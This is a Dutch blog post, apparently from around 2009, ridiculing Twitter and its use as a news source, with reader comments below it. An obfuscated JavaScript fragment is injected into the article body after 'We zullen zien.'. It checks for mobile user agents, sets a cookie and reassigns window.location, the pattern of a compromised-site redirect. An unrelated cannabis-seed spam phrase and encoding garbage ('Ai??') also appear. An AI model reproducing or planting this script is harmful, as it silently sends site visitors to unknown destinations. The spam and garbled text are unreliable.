I twitter, you twat

Twitter is in. Iedereen is aan het tweeten, twatten en twotten. Waar slaat het eigenlijk op? Buying cannabis seeds legal in uk

Twitter, een duidelijker symptoom voor wat er allemaal mis is met onze moderne samenleving is er niet.Ai??AlsAi??vlot, jongAi??mens benAi??je natuurlijkAi??24 uur per dag, 7 dagen per week bereikbaar. Dat is echter niet genoeg.Ai?? Je moet vooral constant iedereen op de hoogste houden van waar je mee bezig bent, of wat er door dat unieke brein van je gaat. Dit is Twitter.com in een notendop.

Je opent je eigen mini-blog en typt de godganse dag via je computer of mobieltje korte berichtjes (tweets); bij voorkeur over je cavia, het wassen van je auto of het feit dat je vriendin ongesteld is. Het lijkt haast alsof een ervaring niets meer waard is tenzij al je vrienden ervan op de hoogte zijn. Twitter heeft een lucht van “ikke ikke ikke.” Al die twoets en twuuts dienen als ideaal hulpmiddel voor de moderne egocentrische mens.

"Ik ben een gigantische twat", aldus Giphart

Misschien nog wel kwalijker is het feit dat Twitter steeds vaker opduikt als bron in serieuze verslaggeving. Bij een belangrijke gebeurtenis, zoals de vliegramp in Haarlemmermeer, zijn het toevallige voorbijgangers die er als de kippen bij zijn om het nieuws te twoetteren en twaateren. Tot nu toe gaat het goed, maar er komt ongetwijfeld een keer dat een krant of nieuwsprogramma gigantisch het schip in gaat door een valse twuut.

Ook BN’ers hebben Twitter ondekt. Ronald Giphart en Tim Overdiek beginnen een heuse roman op hun mini-blogs. Iedereen kan, mits eerst uitgenodigd, een zin toetwatteren. Het idee is leuk, maar er is geen ontkomen aan het gevoel dat het hier meer om de gadget dan om de inhoud gaat. We zullen zien. tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Zoon van Robert, kleinzoon van Laurens, kind van andere tijden, meester der luiheid, verleider der vunzigheid, brouwer des ongenoegens. En nog meer van die zotheden.

17 Reacties op “I twitter, you twat”

 1. ED @ Robin: lees net stukkie op ridders over twitter. vet.

 2. Gna Gna…ik lees dit net via twitter….

 3. Dat zat er natuurlijk dik in…

 4. Same here.. handig dat Twitter ;)

 5. Twitter? Nooit van gehoord.

 6. Als dat derde keyword geen extra bezoekers gaat opleveren, weet ik het ook niet meer.

 7. Ook gevonden via twitter..

 8. Zuuuur!

  Maar ja, wat wil je met Oasis-fans, die houden gewoon niet zo van vernieuwing.

 9. Kijk baron, dat is je ego weer dat opspeelt. Zo zie je maar weer dat de redenering sluitend is!

 10. Nog veel erger dan Twitter zijn al die verontwaardigde stukkies over Twitter. Fijn dat jij ook de moeite hebt genomen om als 300.000e je plasje erover te doen.

 11. Ik vind het trouwens wel wonderlijk dat iemand die Twitter uitkotst, weigert de belachelijkheid van Guitar Hero in te zien…

 12. Er is een verschil tussen belachelijk, en belachelijk leuk.

 13. @Paddy: Goed punt, het was me ook eigenlijk alleen maar te doen om de traffic, want zo’n hoer ben ik wel.

 14. Ridder Robin, gij dwaas! Hoe durft gij uw gal te spuwen over een twittervolk dat voor de poorten van uw kasteel het vrije woord verkondigt. Ridder van het vrije woord? Gij bezoedelt uw eigen naam. Gij rekent u rijk een ridder betaamd, aan traffic?

  Kent gij niet de betekenis van waarde? Van toegevoegde waarde? Uw woorden zijn niet de uwe, maar van zotten gelijk uw spiegelbeeld. Blijft gevoeglijk er naar staren en uw traffic aanbidden.

 15. Ik dacht dat Driek van Wissen zich al doodgezopen had.

 16. Nee hoor – tegenwoordig geeft Driek cursussen mindmapping, check de site.

 17. [...] Billy Mays’, staat er ineens bovenaan de Trending Topics van het veelbesproken Twitter. Als je zo snel na de dood van Michael Jackson bovenaan dat lijstje staat, ben je een hele [...]

Laat een bericht achter